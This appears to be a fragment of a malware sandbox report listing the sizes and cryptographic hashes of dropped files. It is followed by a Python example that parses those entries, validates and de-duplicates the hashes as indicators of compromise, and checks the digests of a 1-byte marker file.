-
Filesize
3KB
MD5
afdbe8b5c48f7db75270c64a3b48611c
SHA1
cddb22e3a394aafddad3761ef84b00ce51d43184
SHA256
5f8432d0251b18591d359c36ef56064dac54369d1e33cd5c2e80f426e6561cd5
SHA512
cea0fb172576abb6378bf9c95054eb1066a612ec6ed698a8dd0d49e5d1364642ef6699051b61dbce3ab98f1596fdbe10ec0ede32e2486ea292499c6f9f97fb89
-
Filesize
593KB
MD5
c8fd9be83bc728cc04beffafc2907fe9
SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD5
1cc453cdf74f31e4d913ff9c10acdde2
SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1.9MB
MD5
fe7facf5c1db2d17313299c58c6e1ca2
SHA1
4dc53db5c9c8ac085f329dec8be5d325a1b46ac5
SHA256
3a566e1932fd6352dbc9e7cd1e5f40c2ca759fd52dd0283bc6284741d407128b
SHA512
1fbb414a57978f8304140fb29f9fb3251ab237b7a776ec5aded99d04ae18b35c7985e956862044c4028c57ae448bc0d45c85a42d94ca440c6063ada3a4318060
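The dropped-file list above is only useful as indicators once it is parsed, de-duplicated and sanity-checked: the extraction has dropped most file paths, fused the hash labels to their values in some entries and split them across lines in others, and repeated many entries verbatim. The following is an added example, not part of the sandbox report or of any Triage tooling. It parses both layouts as they appear on this page, rejects entries whose digests are not hex of the expected length, collapses duplicates on SHA-256 (not MD5, which is collision-prone), flags the entry whose SHA-256 equals the submitted sample's, and re-hashes the 1-byte dropped file to show that it is the single ASCII digit 1. The excerpt in SAMPLE_REPORT is copied from entries above; the function names and the SUBMITTED_SHA256 constant are this example's own.

```python
import hashlib
import re
from collections import Counter

# Hex-digest length each algorithm must have in a well-formed entry.
DIGEST_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
SUBMITTED_SHA256 = "a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271"

# A field line: the label is either fused to its value ("MD5bb3be...") or
# stands alone with the value on the next line ("Filesize" / "738KB").
FIELD_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)(.*)$")

# Constructed excerpt copied from the report above: a CryptnetUrlCache
# metadata file, the 1-byte file, and the submitted sample listed twice.
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5bb3be014755d975c2018921a690cd1c8
SHA182259f22972cd09009e8354948c8b90d7747aeba
SHA256bdda46c7aa0cc1947c3ee8c0c74f06481264399c488acc8e5ef5e13f54ca4b11
SHA512d8d1b2f2e700ca9088f3d5dba5e22a15697a6fb020c574e443663401fa0af1e0a47b472a057eacd9f8e12992bd863b2664689e731b312feb5cc03d3389de2fdc
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
238KB
MD594bb161392626d940ad4e026024ffdd2
SHA1aaafe0247760530a93f7802846ac7ab00cee5940
SHA256a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271
SHA51202e2ec821b0a0e8b03bfa92d7f8c85fc8d29b3090ce745284d1d32ca4961eb295686be3be7d3de86ad1f6ec757fe84eec7daefb05eb9a42c4e0a24432d1a184c
-
Filesize
238KB
MD594bb161392626d940ad4e026024ffdd2
SHA1aaafe0247760530a93f7802846ac7ab00cee5940
SHA256a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271
SHA51202e2ec821b0a0e8b03bfa92d7f8c85fc8d29b3090ce745284d1d32ca4961eb295686be3be7d3de86ad1f6ec757fe84eec7daefb05eb9a42c4e0a24432d1a184c
"""


def _finish(entry):
    """Lower-case the digests; reject any that is not hex of the right length."""
    for algo, n in DIGEST_LEN.items():
        digest = entry.get(algo, "").lower()
        if len(digest) != n or set(digest) - set("0123456789abcdef"):
            raise ValueError(f"malformed {algo} in entry {entry.get('path')!r}: {digest!r}")
        entry[algo] = digest
    for key in ("path", "filesize"):
        entry.setdefault(key, None)
    return entry


def parse_dropped_files(text):
    """One dict per entry; path is None where the extraction dropped it."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    entries, cur, i = [], {}, 0
    while i < len(lines):
        line, i = lines[i], i + 1
        m = FIELD_RE.match(line)
        if line == "-" or m is None:        # separator, or a path opening a new entry
            if cur:
                entries.append(_finish(cur))
            cur = {} if line == "-" else {"path": line}
            continue
        label, value = m.group(1).lower(), m.group(2).strip()
        if not value and i < len(lines):    # split form: the value is the next line
            value, i = lines[i], i + 1
        cur[label] = value
    if cur:
        entries.append(_finish(cur))
    return entries


def unique_iocs(entries, sample_sha256=None):
    """Collapse verbatim duplicates on SHA-256, keeping the first occurrence,
    how many times it appeared, and whether it is the submitted sample."""
    counts = Counter(e["sha256"] for e in entries)
    out, seen = [], set()
    for e in entries:
        if e["sha256"] not in seen:
            seen.add(e["sha256"])
            out.append({**e, "occurrences": counts[e["sha256"]],
                        "is_submitted_sample": e["sha256"] == sample_sha256})
    return out


def verify_bytes(entry, data):
    """Recompute every digest over data and compare with the listed values."""
    return {a: hashlib.new(a, data).hexdigest() == entry[a] for a in DIGEST_LEN}


if __name__ == "__main__":
    iocs = unique_iocs(parse_dropped_files(SAMPLE_REPORT), SUBMITTED_SHA256)
    for ioc in iocs:
        flag = "  (submitted sample)" if ioc["is_submitted_sample"] else ""
        print(f"{ioc['filesize'] or '?':>6}  x{ioc['occurrences']}  {ioc['sha256']}{flag}")
    one_byte = next(e for e in iocs if e["filesize"] == "1B")
    print("1B file is the ASCII digit 1:", verify_bytes(one_byte, b"1"))
```

Feed it the whole list instead of the excerpt and the duplicate runs collapse to one indicator each with a count; a truncated or mistyped digest raises instead of becoming a silent false negative in a blocklist. The 1B entry is worth checking this way because a single-character dropped file is a common marker written by loaders of this family, and recomputing its digests confirms the hashes were copied intact.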